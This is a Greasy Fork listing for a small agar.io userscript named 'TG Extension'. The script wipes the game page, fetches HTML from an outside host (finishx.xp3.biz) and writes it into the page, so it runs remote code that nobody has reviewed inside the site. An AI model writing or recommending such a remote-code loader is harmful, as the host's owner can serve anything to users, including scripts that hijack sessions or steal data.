Greasy Fork is available in English.

TG Extension

Extension TG :D

ผู้เขียน
Adriitonio
จำนวนติดตั้งประจำวัน
0
จำนวนติดตั้งทั้งหมด
757
คะแนน
2 0 0
เวอร์ชัน
0.2
สร้างเมื่อ
29-11-2015
อัปเดตเมื่อ
29-11-2015
สัญญาอนุญาต
ไม่มี
ปรับใช้กับ

// ==UserScript==
// @name TG Extension
// @namespace
// @version 0.2
// @description Extension TG :D
// @author Houb1
// @match http://agar.io/*
// @match https://agar.io/*
// @run-at document-start
// @grant GM_xmlhttpRequest
// ==/UserScript==

window.stop()
document.documentElement.innerHTML = null

GM_xmlhttpRequest({method: 'GET', url: 'http://finishx.xp3.biz/agar/',
onload: function(r) {
document.open()
document.write(r.responseText)
document.close()
}
})